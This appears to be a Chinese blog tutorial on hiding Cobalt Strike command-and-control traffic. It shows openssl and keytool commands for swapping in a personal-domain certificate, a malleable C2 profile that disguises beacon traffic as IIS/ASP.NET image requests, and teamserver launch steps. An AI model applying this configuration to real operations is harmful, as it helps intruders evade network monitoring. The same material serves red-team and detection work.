CobaltStrike 流量隐藏

0x1 https流量隐藏

        前言:经过https加密后的流量虽然不是明文,但是cobaltstrike的默认证书有很多敏感文字,

                非常容易被识别。除此之外,使用默认的证书,流量也很容易被解密;

       解决:生成个人域名的证书;步骤如下:

        1. 去申请一个个人域名,推荐 https://www.namecheap.com/

        2.去给域名申请一个证书,下载证书压缩包;推荐 SSL For Free LoginLog in to your SSL For Free account to manage your certificates and get expiration notifications.https://manage.sslforfree.com/login
FreeSSL首页 - FreeSSL.cn一个提供免费HTTPS证书申请的网站FreeSSL - 一个申请免费HTTPS证书的网站,免费HTTPS证书,免费SSL证书,免费证书https://freessl.cn/

        3.上传证书压缩包到 cobaltstrike 目录,并解压;

        4.将证书转成 cobaltstrike.store 格式;

## 将公钥、私钥等转换格式
openssl pkcs12 -export -in {公钥文件} -inkey {私钥文件} -out {输出文件的命名} -name {证书对应的域名} -passout pass:{设置证书密码,需要记住}

openssl pkcs12 -export -in full_chain.pem -inkey private.key -out cdn.cseroadweb.xyz.p12 -name cdn.cseroadweb.xyz -passout pass:ccc123456


## 使用keytool生成 store 证书
keytool -importkeystore -deststorepass {上一步设置的密码} -destkeypass {上一步设置的密码} -destkeystore {输出文件的命名} -srckeystore {上一步输出的文件的路径} -srcstoretype PKCS12 -srcstorepass {上一步设置的密码} -alias {证书对应的域名}

keytool -importkeystore -deststorepass ccc123456 -destkeypass ccc123456 -destkeystore new.store -srckeystore cdn.cseroadweb.xyz.p12 -srcstoretype PKCS12 -srcstorepass ccc123456 -alias cdn.cseroadweb.xyz

## 生成store证书后,有1个warning,最好再对证书进行一个格式转换;new-2.store 是刚刚生成的store证书;
keytool -importkeystore -srckeystore new-2.store -destkeystore new-2.store -deststoretype pkcs12

        5.替换服务端与客户端通话的证书;

                修改teamserver,将 cobaltstrike.store 替换成我们生成的store证书;

        6.替换 web https 默认证书;

                6.1创建 profile文件,写下如下内容;

set sample_name "Etumbot";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/image/";

    client {

        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";

        metadata {
            netbios;
            append "-.jpg";
            uri-append;
        }
    }

    server {

        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";

        output {
            base64;
            print;
        }
    }
}

http-post {
    set uri "/history/";

    client {

        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";

        id {
            netbiosu;
            append ".asp";
            uri-append;
        }

        output {
            base64;
            print;
        }
    }

    server {

        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";

        output {
            base64;
            print;
        }
    }
}
https-certificate {
    set keystore "new.store";
    set password "Testaaa@1234";
}

                 6.2 验证 profile 是否可用;

                         ./c2lint profile

        7. 启动cobaltstrike 服务端;设置profile 运行 teamserver;

                ./teamserver xx.xx.xx.xx passwd profile

        

        8.验证:访问cobaltstrike 服务端口、cobaltstrike listener 端口;查看证书,看到证书已经

            替换成我们的私人证书了;             

 

 

版权声明:本文为qq_43615820原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。